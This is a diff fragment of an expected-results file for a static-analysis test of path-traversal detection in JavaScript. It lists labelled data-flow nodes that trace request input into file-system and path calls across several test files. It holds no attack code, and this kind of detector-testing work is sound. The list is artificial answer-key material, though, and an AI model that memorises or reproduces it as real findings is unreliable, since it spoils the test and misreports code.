TaintedPath.js:36:10:36:39 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:36:10:36:44 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:36:20:36:26 | req.url | semmle.label | req.url | +| TaintedPath.js:39:29:39:52 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | +| TaintedPath.js:39:48:39:51 | path | semmle.label | path | +| TaintedPath.js:42:29:42:49 | pathMod ... n(path) | semmle.label | pathMod ... n(path) | +| TaintedPath.js:42:45:42:48 | path | semmle.label | path | +| TaintedPath.js:43:29:43:58 | pathMod ... ath, z) | semmle.label | pathMod ... ath, z) | +| TaintedPath.js:43:51:43:54 | path | semmle.label | path | +| TaintedPath.js:44:29:44:54 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | +| TaintedPath.js:44:50:44:53 | path | semmle.label | path | +| TaintedPath.js:45:29:45:56 | pathMod ... , path) | semmle.label | pathMod ... , path) | +| TaintedPath.js:45:52:45:55 | path | semmle.label | path | +| TaintedPath.js:46:29:46:56 | pathMod ... ath, x) | semmle.label | pathMod ... ath, x) | +| TaintedPath.js:46:49:46:52 | path | semmle.label | path | +| TaintedPath.js:47:29:47:52 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | +| TaintedPath.js:47:48:47:51 | path | semmle.label | path | +| TaintedPath.js:48:29:48:61 | pathMod ... ath, z) | semmle.label | pathMod ... ath, z) | +| TaintedPath.js:48:54:48:57 | path | semmle.label | path | +| TaintedPath.js:49:29:49:61 | pathMod ... h(path) | semmle.label | pathMod ... h(path) | +| TaintedPath.js:49:57:49:60 | path | semmle.label | path | +| TaintedPath.js:54:31:54:70 | require ... eq.url) | semmle.label | require ... eq.url) | +| TaintedPath.js:54:31:54:76 | require ... ).query | semmle.label | require ... ).query | +| TaintedPath.js:54:63:54:69 | req.url | semmle.label | req.url | +| TaintedPath.js:55:31:55:68 | require ... eq.url) | semmle.label | require ... eq.url) | +| TaintedPath.js:55:31:55:74 | require ... ).query | semmle.label | require ... ).query | +| TaintedPath.js:55:61:55:67 | req.url | semmle.label | req.url | +| TaintedPath.js:56:31:56:67 | require ... eq.url) | semmle.label | require ... eq.url) | +| TaintedPath.js:56:31:56:73 | require ... ).query | semmle.label | require ... ).query | +| TaintedPath.js:56:60:56:66 | req.url | semmle.label | req.url | +| TaintedPath.js:64:48:64:60 | req.params[0] | semmle.label | req.params[0] | +| TaintedPath.js:73:6:73:47 | path | semmle.label | path | +| TaintedPath.js:73:13:73:36 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:73:13:73:42 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:73:13:73:47 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:73:23:73:29 | req.url | semmle.label | req.url | +| TaintedPath.js:75:28:75:48 | fs.real ... c(path) | semmle.label | fs.real ... c(path) | +| TaintedPath.js:75:44:75:47 | path | semmle.label | path | +| TaintedPath.js:76:14:76:17 | path | semmle.label | path | +| TaintedPath.js:77:32:77:39 | realpath | semmle.label | realpath | +| TaintedPath.js:78:45:78:52 | realpath | semmle.label | realpath | +| TaintedPath.js:109:6:109:47 | path | semmle.label | path | +| TaintedPath.js:109:13:109:36 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:109:13:109:42 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:109:13:109:47 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:109:23:109:29 | req.url | semmle.label | req.url | +| TaintedPath.js:111:23:111:26 | path | semmle.label | path | +| TaintedPath.js:115:7:115:48 | path | semmle.label | path | +| TaintedPath.js:115:14:115:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:115:14:115:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:115:14:115:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:115:24:115:30 | req.url | semmle.label | req.url | +| TaintedPath.js:117:19:117:22 | path | semmle.label | path | +| TaintedPath.js:119:7:119:29 | split | semmle.label | split | +| TaintedPath.js:119:15:119:18 | path | semmle.label | path | +| TaintedPath.js:119:15:119:29 | path.split("/") | semmle.label | path.split("/") | +| TaintedPath.js:121:19:121:23 | split | semmle.label | split | +| TaintedPath.js:121:19:121:33 | split.join("/") | semmle.label | split.join("/") | +| TaintedPath.js:125:19:125:23 | split | semmle.label | split | +| TaintedPath.js:125:19:125:26 | split[x] | semmle.label | split[x] | +| TaintedPath.js:126:19:126:35 | prefix + split[x] | semmle.label | prefix + split[x] | +| TaintedPath.js:126:28:126:32 | split | semmle.label | split | +| TaintedPath.js:126:28:126:35 | split[x] | semmle.label | split[x] | +| TaintedPath.js:128:7:128:38 | concatted | semmle.label | concatted | +| TaintedPath.js:128:19:128:38 | prefix.concat(split) | semmle.label | prefix.concat(split) | +| TaintedPath.js:128:33:128:37 | split | semmle.label | split | +| TaintedPath.js:129:19:129:27 | concatted | semmle.label | concatted | +| TaintedPath.js:129:19:129:37 | concatted.join("/") | semmle.label | concatted.join("/") | +| TaintedPath.js:131:7:131:39 | concatted2 | semmle.label | concatted2 | +| TaintedPath.js:131:20:131:24 | split | semmle.label | split | +| TaintedPath.js:131:20:131:39 | split.concat(prefix) | semmle.label | split.concat(prefix) | +| TaintedPath.js:132:19:132:28 | concatted2 | semmle.label | concatted2 | +| TaintedPath.js:132:19:132:38 | concatted2.join("/") | semmle.label | concatted2.join("/") | +| TaintedPath.js:134:19:134:23 | split | semmle.label | split | +| TaintedPath.js:134:19:134:29 | split.pop() | semmle.label | split.pop() | +| TaintedPath.js:139:7:139:48 | path | semmle.label | path | +| TaintedPath.js:139:14:139:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:139:14:139:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:139:14:139:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:139:24:139:30 | req.url | semmle.label | req.url | +| TaintedPath.js:143:29:143:32 | path | semmle.label | path | +| TaintedPath.js:143:29:143:55 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | +| TaintedPath.js:149:29:149:32 | path | semmle.label | path | +| TaintedPath.js:149:29:149:52 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | +| TaintedPath.js:150:29:150:32 | path | semmle.label | path | +| TaintedPath.js:150:29:150:53 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | +| TaintedPath.js:151:29:151:32 | path | semmle.label | path | +| TaintedPath.js:151:29:151:51 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | +| TaintedPath.js:152:29:152:32 | path | semmle.label | path | +| TaintedPath.js:152:29:152:57 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | +| TaintedPath.js:167:29:167:73 | "prefix ... +/, '') | semmle.label | "prefix ... +/, '') | +| TaintedPath.js:167:40:167:43 | path | semmle.label | path | +| TaintedPath.js:167:40:167:73 | path.re ... +/, '') | semmle.label | path.re ... +/, '') | +| TaintedPath.js:168:29:168:54 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | +| TaintedPath.js:168:29:168:84 | pathMod ... +/, '') | semmle.label | pathMod ... +/, '') | +| TaintedPath.js:168:50:168:53 | path | semmle.label | path | +| TaintedPath.js:176:29:176:45 | qs.parse(req.url) | semmle.label | qs.parse(req.url) | +| TaintedPath.js:176:29:176:49 | qs.pars ... rl).foo | semmle.label | qs.pars ... rl).foo | +| TaintedPath.js:176:38:176:44 | req.url | semmle.label | req.url | +| TaintedPath.js:177:29:177:59 | qs.pars ... q.url)) | semmle.label | qs.pars ... q.url)) | +| TaintedPath.js:177:29:177:63 | qs.pars ... l)).foo | semmle.label | qs.pars ... l)).foo | +| TaintedPath.js:177:38:177:58 | normali ... eq.url) | semmle.label | normali ... eq.url) | +| TaintedPath.js:177:51:177:57 | req.url | semmle.label | req.url | +| TaintedPath.js:179:29:179:51 | parseqs ... eq.url) | semmle.label | parseqs ... eq.url) | +| TaintedPath.js:179:29:179:55 | parseqs ... rl).foo | semmle.label | parseqs ... rl).foo | +| TaintedPath.js:179:44:179:50 | req.url | semmle.label | req.url | +| TaintedPath.js:184:7:184:48 | path | semmle.label | path | +| TaintedPath.js:184:14:184:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:184:14:184:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:184:14:184:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:184:24:184:30 | req.url | semmle.label | req.url | +| TaintedPath.js:185:31:185:34 | path | semmle.label | path | +| TaintedPath.js:186:45:186:48 | path | semmle.label | path | +| TaintedPath.js:187:35:187:38 | path | semmle.label | path | +| TaintedPath.js:191:7:191:48 | path | semmle.label | path | +| TaintedPath.js:191:14:191:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:191:14:191:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:191:14:191:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:191:24:191:30 | req.url | semmle.label | req.url | +| TaintedPath.js:195:29:195:32 | path | semmle.label | path | +| TaintedPath.js:195:29:195:85 | path.re ... '), '') | semmle.label | path.re ... '), '') | +| TaintedPath.js:200:7:200:48 | path | semmle.label | path | +| TaintedPath.js:200:14:200:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:200:14:200:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:200:14:200:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:200:24:200:30 | req.url | semmle.label | req.url | +| TaintedPath.js:202:29:202:32 | path | semmle.label | path | +| TaintedPath.js:202:29:202:68 | path.re ... '), '') | semmle.label | path.re ... '), '') | +| TaintedPath.js:205:31:205:34 | path | semmle.label | path | +| TaintedPath.js:205:31:205:69 | path.re ... '), '') | semmle.label | path.re ... '), '') | +| TaintedPath.js:212:7:212:48 | path | semmle.label | path | +| TaintedPath.js:212:14:212:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:212:14:212:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:212:14:212:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:212:24:212:30 | req.url | semmle.label | req.url | +| TaintedPath.js:213:9:213:37 | improperEscape | semmle.label | improperEscape | +| TaintedPath.js:213:26:213:37 | escape(path) | semmle.label | escape(path) | +| TaintedPath.js:213:33:213:36 | path | semmle.label | path | +| TaintedPath.js:214:29:214:42 | improperEscape | semmle.label | improperEscape | +| TaintedPath.js:215:9:215:40 | improperEscape2 | semmle.label | improperEscape2 | +| TaintedPath.js:215:27:215:40 | unescape(path) | semmle.label | unescape(path) | +| TaintedPath.js:215:36:215:39 | path | semmle.label | path | +| TaintedPath.js:216:29:216:43 | improperEscape2 | semmle.label | improperEscape2 | +| examples/TaintedPath.js:8:7:8:52 | filePath | semmle.label | filePath | +| examples/TaintedPath.js:8:18:8:41 | url.par ... , true) | semmle.label | url.par ... , true) | +| examples/TaintedPath.js:8:18:8:47 | url.par ... ).query | semmle.label | url.par ... ).query | +| examples/TaintedPath.js:8:18:8:52 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| examples/TaintedPath.js:8:28:8:34 | req.url | semmle.label | req.url | +| examples/TaintedPath.js:10:29:10:43 | ROOT + filePath | semmle.label | ROOT + filePath | +| examples/TaintedPath.js:10:36:10:43 | filePath | semmle.label | filePath | +| express.js:8:20:8:32 | req.query.bar | semmle.label | req.query.bar | +| handlebars.js:10:51:10:58 | filePath | semmle.label | filePath | +| handlebars.js:11:32:11:39 | filePath | semmle.label | filePath | +| handlebars.js:13:73:13:80 | filePath | semmle.label | filePath | +| handlebars.js:15:25:15:32 | filePath | semmle.label | filePath | +| handlebars.js:29:46:29:60 | req.params.path | semmle.label | req.params.path | +| handlebars.js:43:15:43:29 | req.params.path | semmle.label | req.params.path | +| hapi.js:14:19:14:51 | filepath | semmle.label | filepath | +| hapi.js:14:30:14:51 | request ... ilepath | semmle.label | request ... ilepath | +| hapi.js:15:44:15:51 | filepath | semmle.label | filepath | +| more-fs-extra.js:8:11:8:22 | { filename } | semmle.label | { filename } | +| more-fs-extra.js:8:11:8:33 | filename | semmle.label | filename | +| more-fs-extra.js:8:13:8:20 | filename | semmle.label | filename | +| more-fs-extra.js:8:26:8:33 | req.body | semmle.label | req.body | +| more-fs-extra.js:10:15:10:22 | filename | semmle.label | filename | +| more-fs-extra.js:11:11:11:18 | filename | semmle.label | filename | +| more-fs-extra.js:12:14:12:21 | filename | semmle.label | filename | +| more-fs-extra.js:13:18:13:25 | filename | semmle.label | filename | +| more-fs-extra.js:14:11:14:18 | filename | semmle.label | filename | +| more-fs-extra.js:15:21:15:28 | filename | semmle.label | filename | +| more-fs-extra.js:16:21:16:28 | filename | semmle.label | filename | +| more-fs-extra.js:17:31:17:38 | filename | semmle.label | filename | +| more-fs-extra.js:18:15:18:22 | filename | semmle.label | filename | +| more-fs-extra.js:19:25:19:32 | filename | semmle.label | filename | +| more-fs-extra.js:20:21:20:28 | filename | semmle.label | filename | +| more-fs-extra.js:21:17:21:24 | filename | semmle.label | filename | +| more-fs-extra.js:22:16:22:23 | filename | semmle.label | filename | +| more-fs-extra.js:23:20:23:27 | filename | semmle.label | filename | +| more-fs-extra.js:24:19:24:26 | filename | semmle.label | filename | +| more-fs-extra.js:25:15:25:22 | filename | semmle.label | filename | +| more-fs-extra.js:26:19:26:26 | filename | semmle.label | filename | +| more-fs-extra.js:27:13:27:20 | filename | semmle.label | filename | +| more-fs-extra.js:28:17:28:24 | filename | semmle.label | filename | +| more-fs-extra.js:29:23:29:30 | filename | semmle.label | filename | +| more-fs-extra.js:30:16:30:23 | filename | semmle.label | filename | +| more-fs-extra.js:31:20:31:27 | filename | semmle.label | filename | +| more-fs-extra.js:32:23:32:30 | filename | semmle.label | filename | +| normalizedPaths.js:11:7:11:27 | path | semmle.label | path | +| normalizedPaths.js:11:14:11:27 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:13:19:13:22 | path | semmle.label | path | +| normalizedPaths.js:14:19:14:29 | './' + path | semmle.label | './' + path | +| normalizedPaths.js:14:26:14:29 | path | semmle.label | path | +| normalizedPaths.js:15:19:15:22 | path | semmle.label | path | +| normalizedPaths.js:15:19:15:38 | path + '/index.html' | semmle.label | path + '/index.html' | +| normalizedPaths.js:16:19:16:53 | pathMod ... .html') | semmle.label | pathMod ... .html') | +| normalizedPaths.js:16:35:16:38 | path | semmle.label | path | +| normalizedPaths.js:17:19:17:57 | pathMod ... , path) | semmle.label | pathMod ... , path) | +| normalizedPaths.js:17:53:17:56 | path | semmle.label | path | +| normalizedPaths.js:21:7:21:49 | path | semmle.label | path | +| normalizedPaths.js:21:14:21:49 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | +| normalizedPaths.js:21:35:21:48 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:23:19:23:22 | path | semmle.label | path | +| normalizedPaths.js:24:19:24:29 | './' + path | semmle.label | './' + path | +| normalizedPaths.js:24:26:24:29 | path | semmle.label | path | +| normalizedPaths.js:25:19:25:22 | path | semmle.label | path | +| normalizedPaths.js:25:19:25:38 | path + '/index.html' | semmle.label | path + '/index.html' | +| normalizedPaths.js:26:19:26:53 | pathMod ... .html') | semmle.label | pathMod ... .html') | +| normalizedPaths.js:26:35:26:38 | path | semmle.label | path | +| normalizedPaths.js:27:19:27:57 | pathMod ... , path) | semmle.label | pathMod ... , path) | +| normalizedPaths.js:27:53:27:56 | path | semmle.label | path | +| normalizedPaths.js:31:7:31:49 | path | semmle.label | path | +| normalizedPaths.js:31:14:31:49 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | +| normalizedPaths.js:31:35:31:48 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:36:19:36:22 | path | semmle.label | path | +| normalizedPaths.js:41:21:41:24 | path | semmle.label | path | +| normalizedPaths.js:54:7:54:49 | path | semmle.label | path | +| normalizedPaths.js:54:14:54:49 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | +| normalizedPaths.js:54:35:54:48 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:59:19:59:22 | path | semmle.label | path | +| normalizedPaths.js:63:19:63:22 | path | semmle.label | path | +| normalizedPaths.js:63:19:63:38 | path + "/index.html" | semmle.label | path + "/index.html" | +| normalizedPaths.js:68:21:68:24 | path | semmle.label | path | +| normalizedPaths.js:73:7:73:56 | path | semmle.label | path | +| normalizedPaths.js:73:14:73:56 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | +| normalizedPaths.js:73:35:73:55 | './' + ... ry.path | semmle.label | './' + ... ry.path | +| normalizedPaths.js:73:42:73:55 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:78:22:78:25 | path | semmle.label | path | +| normalizedPaths.js:82:7:82:27 | path | semmle.label | path | +| normalizedPaths.js:82:14:82:27 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:87:29:87:32 | path | semmle.label | path | +| normalizedPaths.js:90:31:90:34 | path | semmle.label | path | +| normalizedPaths.js:94:7:94:49 | path | semmle.label | path | +| normalizedPaths.js:94:14:94:49 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | +| normalizedPaths.js:94:35:94:48 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:99:29:99:32 | path | semmle.label | path | +| normalizedPaths.js:117:7:117:44 | path | semmle.label | path | +| normalizedPaths.js:117:14:117:44 | fs.real ... y.path) | semmle.label | fs.real ... y.path) | +| normalizedPaths.js:117:30:117:43 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:119:19:119:22 | path | semmle.label | path | +| normalizedPaths.js:120:19:120:53 | pathMod ... .html') | semmle.label | pathMod ... .html') | +| normalizedPaths.js:120:35:120:38 | path | semmle.label | path | +| normalizedPaths.js:130:7:130:49 | path | semmle.label | path | +| normalizedPaths.js:130:14:130:49 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | +| normalizedPaths.js:130:35:130:48 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:135:21:135:24 | path | semmle.label | path | +| normalizedPaths.js:139:7:139:62 | path | semmle.label | path | +| normalizedPaths.js:139:14:139:62 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | +| normalizedPaths.js:139:48:139:61 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:144:21:144:24 | path | semmle.label | path | +| normalizedPaths.js:148:7:148:58 | path | semmle.label | path | +| normalizedPaths.js:148:14:148:58 | 'foo/' ... y.path) | semmle.label | 'foo/' ... y.path) | +| normalizedPaths.js:148:23:148:58 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | +| normalizedPaths.js:148:44:148:57 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:151:21:151:24 | path | semmle.label | path | +| normalizedPaths.js:153:21:153:24 | path | semmle.label | path | +| normalizedPaths.js:160:7:160:49 | path | semmle.label | path | +| normalizedPaths.js:160:14:160:49 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | +| normalizedPaths.js:160:35:160:48 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:165:19:165:22 | path | semmle.label | path | +| normalizedPaths.js:170:21:170:24 | path | semmle.label | path | +| normalizedPaths.js:174:7:174:27 | path | semmle.label | path | +| normalizedPaths.js:174:14:174:27 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:184:19:184:22 | path | semmle.label | path | +| normalizedPaths.js:187:21:187:24 | path | semmle.label | path | +| normalizedPaths.js:189:21:189:24 | path | semmle.label | path | +| normalizedPaths.js:192:21:192:24 | path | semmle.label | path | +| normalizedPaths.js:194:21:194:24 | path | semmle.label | path | +| normalizedPaths.js:199:21:199:24 | path | semmle.label | path | +| normalizedPaths.js:201:7:201:49 | normalizedPath | semmle.label | normalizedPath | +| normalizedPaths.js:201:24:201:49 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | +| normalizedPaths.js:201:45:201:48 | path | semmle.label | path | +| normalizedPaths.js:205:21:205:34 | normalizedPath | semmle.label | normalizedPath | +| normalizedPaths.js:208:21:208:34 | normalizedPath | semmle.label | normalizedPath | +| normalizedPaths.js:210:21:210:34 | normalizedPath | semmle.label | normalizedPath | +| normalizedPaths.js:214:7:214:49 | path | semmle.label | path | +| normalizedPaths.js:214:14:214:49 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | +| normalizedPaths.js:214:35:214:48 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:219:3:219:33 | path | semmle.label | path | +| normalizedPaths.js:219:10:219:33 | decodeU ... t(path) | semmle.label | decodeU ... t(path) | +| normalizedPaths.js:219:29:219:32 | path | semmle.label | path | +| normalizedPaths.js:222:21:222:24 | path | semmle.label | path | +| normalizedPaths.js:226:7:226:70 | path | semmle.label | path | +| normalizedPaths.js:226:14:226:49 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | +| normalizedPaths.js:226:14:226:70 | pathMod ... g, ' ') | semmle.label | pathMod ... g, ' ') | +| normalizedPaths.js:226:35:226:48 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:228:21:228:24 | path | semmle.label | path | +| normalizedPaths.js:236:7:236:47 | path | semmle.label | path | +| normalizedPaths.js:236:14:236:47 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | +| normalizedPaths.js:236:33:236:46 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:238:19:238:22 | path | semmle.label | path | +| normalizedPaths.js:245:21:245:24 | path | semmle.label | path | +| normalizedPaths.js:250:21:250:24 | path | semmle.label | path | +| normalizedPaths.js:254:7:254:47 | path | semmle.label | path | +| normalizedPaths.js:254:14:254:47 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | +| normalizedPaths.js:254:33:254:46 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:256:19:256:22 | path | semmle.label | path | +| normalizedPaths.js:262:21:262:24 | path | semmle.label | path | +| normalizedPaths.js:267:7:267:42 | newpath | semmle.label | newpath | +| normalizedPaths.js:267:17:267:42 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | +| normalizedPaths.js:267:38:267:41 | path | semmle.label | path | +| normalizedPaths.js:270:21:270:27 | newpath | semmle.label | newpath | +| normalizedPaths.js:275:7:275:42 | newpath | semmle.label | newpath | +| normalizedPaths.js:275:17:275:42 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | +| normalizedPaths.js:275:38:275:41 | path | semmle.label | path | +| normalizedPaths.js:278:21:278:27 | newpath | semmle.label | newpath | +| normalizedPaths.js:283:7:283:42 | newpath | semmle.label | newpath | +| normalizedPaths.js:283:17:283:42 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | +| normalizedPaths.js:283:38:283:41 | path | semmle.label | path | +| normalizedPaths.js:286:21:286:27 | newpath | semmle.label | newpath | +| normalizedPaths.js:291:7:291:42 | newpath | semmle.label | newpath | +| normalizedPaths.js:291:17:291:42 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | +| normalizedPaths.js:291:38:291:41 | path | semmle.label | path | +| normalizedPaths.js:296:21:296:27 | newpath | semmle.label | newpath | +| normalizedPaths.js:303:6:303:26 | path | semmle.label | path | +| normalizedPaths.js:303:13:303:26 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:304:18:304:21 | path | semmle.label | path | +| normalizedPaths.js:309:19:309:22 | path | semmle.label | path | +| normalizedPaths.js:313:19:313:22 | path | semmle.label | path | +| normalizedPaths.js:316:19:316:22 | path | semmle.label | path | +| normalizedPaths.js:320:6:320:49 | normalizedPath | semmle.label | normalizedPath | +| normalizedPaths.js:320:23:320:49 | pathMod ... , path) | semmle.label | pathMod ... , path) | +| normalizedPaths.js:320:45:320:48 | path | semmle.label | path | +| normalizedPaths.js:325:19:325:32 | normalizedPath | semmle.label | normalizedPath | +| normalizedPaths.js:332:19:332:32 | normalizedPath | semmle.label | normalizedPath | +| normalizedPaths.js:339:6:339:46 | path | semmle.label | path | +| normalizedPaths.js:339:13:339:46 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | +| normalizedPaths.js:339:32:339:45 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:341:18:341:21 | path | semmle.label | path | +| normalizedPaths.js:346:19:346:22 | path | semmle.label | path | +| normalizedPaths.js:354:7:354:27 | path | semmle.label | path | +| normalizedPaths.js:354:14:354:27 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:356:19:356:22 | path | semmle.label | path | +| normalizedPaths.js:358:7:358:51 | requestPath | semmle.label | requestPath | +| normalizedPaths.js:358:21:358:51 | pathMod ... , path) | semmle.label | pathMod ... , path) | +| normalizedPaths.js:358:47:358:50 | path | semmle.label | path | +| normalizedPaths.js:363:21:363:31 | requestPath | semmle.label | requestPath | +| normalizedPaths.js:377:7:377:27 | path | semmle.label | path | +| normalizedPaths.js:377:14:377:27 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:379:19:379:22 | path | semmle.label | path | +| normalizedPaths.js:381:19:381:29 | slash(path) | semmle.label | slash(path) | +| normalizedPaths.js:381:25:381:28 | path | semmle.label | path | +| normalizedPaths.js:385:7:385:46 | path | semmle.label | path | +| normalizedPaths.js:385:14:385:46 | pathMod ... uery.x) | semmle.label | pathMod ... uery.x) | +| normalizedPaths.js:385:35:385:45 | req.query.x | semmle.label | req.query.x | +| normalizedPaths.js:388:19:388:22 | path | semmle.label | path | +| normalizedPaths.js:399:21:399:24 | path | semmle.label | path | +| normalizedPaths.js:407:19:407:67 | pathMod ... t('/')) | semmle.label | pathMod ... t('/')) | +| normalizedPaths.js:407:45:407:55 | req.query.x | semmle.label | req.query.x | +| normalizedPaths.js:407:45:407:66 | req.que ... it('/') | semmle.label | req.que ... it('/') | +| normalizedPaths.js:408:19:408:60 | pathMod ... t('/')) | semmle.label | pathMod ... t('/')) | +| normalizedPaths.js:408:38:408:48 | req.query.x | semmle.label | req.query.x | +| normalizedPaths.js:408:38:408:59 | req.que ... it('/') | semmle.label | req.que ... it('/') | +| normalizedPaths.js:412:7:412:46 | path | semmle.label | path | +| normalizedPaths.js:412:14:412:46 | pathMod ... uery.x) | semmle.label | pathMod ... uery.x) | +| normalizedPaths.js:412:35:412:45 | req.query.x | semmle.label | req.query.x | +| normalizedPaths.js:415:19:415:22 | path | semmle.label | path | +| normalizedPaths.js:426:21:426:24 | path | semmle.label | path | +| other-fs-libraries.js:9:7:9:48 | path | semmle.label | path | +| other-fs-libraries.js:9:14:9:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| other-fs-libraries.js:9:14:9:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| other-fs-libraries.js:9:14:9:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| other-fs-libraries.js:9:24:9:30 | req.url | semmle.label | req.url | +| other-fs-libraries.js:11:19:11:22 | path | semmle.label | path | +| other-fs-libraries.js:12:27:12:30 | path | semmle.label | path | +| other-fs-libraries.js:13:24:13:27 | path | semmle.label | path | +| other-fs-libraries.js:14:27:14:30 | path | semmle.label | path | +| other-fs-libraries.js:16:34:16:37 | path | semmle.label | path | +| other-fs-libraries.js:17:35:17:38 | path | semmle.label | path | +| other-fs-libraries.js:19:56:19:59 | path | semmle.label | path | +| other-fs-libraries.js:24:35:24:38 | path | semmle.label | path | +| other-fs-libraries.js:38:7:38:48 | path | semmle.label | path | +| other-fs-libraries.js:38:14:38:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| other-fs-libraries.js:38:14:38:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| other-fs-libraries.js:38:14:38:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| other-fs-libraries.js:38:24:38:30 | req.url | semmle.label | req.url | +| other-fs-libraries.js:40:35:40:38 | path | semmle.label | path | +| other-fs-libraries.js:41:50:41:53 | path | semmle.label | path | +| other-fs-libraries.js:42:53:42:56 | path | semmle.label | path | +| other-fs-libraries.js:49:7:49:48 | path | semmle.label | path | +| other-fs-libraries.js:49:14:49:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| other-fs-libraries.js:49:14:49:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| other-fs-libraries.js:49:14:49:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| other-fs-libraries.js:49:24:49:30 | req.url | semmle.label | req.url | +| other-fs-libraries.js:51:19:51:22 | path | semmle.label | path | +| other-fs-libraries.js:52:24:52:27 | path | semmle.label | path | +| other-fs-libraries.js:54:36:54:39 | path | semmle.label | path | +| other-fs-libraries.js:55:36:55:39 | path | semmle.label | path | +| other-fs-libraries.js:57:46:57:49 | path | semmle.label | path | +| other-fs-libraries.js:59:39:59:42 | path | semmle.label | path | +| other-fs-libraries.js:62:43:62:46 | path | semmle.label | path | +| other-fs-libraries.js:63:51:63:54 | path | semmle.label | path | +| other-fs-libraries.js:68:7:68:48 | path | semmle.label | path | +| other-fs-libraries.js:68:14:68:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| other-fs-libraries.js:68:14:68:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| other-fs-libraries.js:68:14:68:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| other-fs-libraries.js:68:24:68:30 | req.url | semmle.label | req.url | +| other-fs-libraries.js:70:19:70:22 | path | semmle.label | path | +| other-fs-libraries.js:71:10:71:13 | path | semmle.label | path | +| other-fs-libraries.js:72:15:72:18 | path | semmle.label | path | +| other-fs-libraries.js:73:8:73:11 | path | semmle.label | path | +| other-fs-libraries.js:75:15:75:15 | x | semmle.label | x | 